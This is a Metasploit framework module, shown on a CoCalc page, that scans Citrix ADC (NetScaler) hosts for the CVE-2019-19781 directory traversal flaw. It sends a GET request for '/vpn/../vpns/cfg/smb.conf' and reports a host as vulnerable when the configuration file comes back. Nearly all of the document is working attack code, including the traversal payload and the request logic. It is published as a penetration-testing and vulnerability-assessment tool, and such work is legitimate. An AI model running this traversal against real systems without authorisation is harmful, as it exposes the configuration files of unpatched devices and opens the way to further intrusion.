CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  include Msf::Exploit::Remote::HttpClient

9
  include Msf::Auxiliary::Scanner

10
  include Msf::Auxiliary::Report

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Citrix ADC (NetScaler) Directory Traversal Scanner',

15
      'Description'    => %{

16
        This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC

17
        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request

18
        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of

19
        a "[global]" directive in smb.conf, which this file should always contain.

20
      },

21
      'Author'         => [

22
        'Mikhail Klyuchnikov', # Discovery

23
        'Erik Wynter',         # Module (@wyntererik)

24
        'altonjx'              # Module (@altonjx)

25
      ],

26
      'References'     => [

27
        ['CVE', '2019-19781'],

28
        ['URL', 'https://web.archive.org/web/20200111095223/https://support.citrix.com/article/CTX267027/'],

29
        ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']

30
      ],

31
      'DisclosureDate' => '2019-12-17',

32
      'License'        => MSF_LICENSE,

33
      'Notes'          => {

34
        'AKA'          => ['Shitrix']

35
      }

36
    ))

37


38
    register_options([

39
      OptString.new('TARGETURI', [true, 'Base path', '/']),

40
      OptString.new('PATH',      [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])

41
    ])

42
  end

43


44
  def run_host(target_host)

45
    turi = normalize_uri(target_uri.path, datastore['PATH'])

46


47
    res = send_request_cgi(

48
      'method' => 'GET',

49
      'uri'    =>  turi

50
    )

51


52
    unless res

53
      print_error("#{full_uri(turi)} - No response, target seems down.")

54


55
      return Exploit::CheckCode::Unknown

56
    end

57


58
    unless res.code == 200

59
      print_error("#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.")

60
      vprint_error("Obtained HTTP response code #{res.code} for #{full_uri(turi)}.")

61


62
      return Exploit::CheckCode::Safe

63
    end

64


65
    if turi.end_with?('smb.conf')

66
      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\[\s*global\s*\]/)

67
        vprint_warning("#{turi} does not contain \"[global]\" directive.")

68
      end

69
    end

70


71
    print_good("#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.")

72
    msg = "Obtained HTTP response code #{res.code} for #{full_uri(turi)}. " \

73
          "This means that access to #{turi} was obtained via directory traversal."

74
    vprint_good(msg)

75


76
    report_vuln(

77
      host: target_host,

78
      name: name,

79
      refs: references,

80
      info: msg

81
    )

82


83
    Exploit::CheckCode::Vulnerable

84
  end

85


86
end

87


88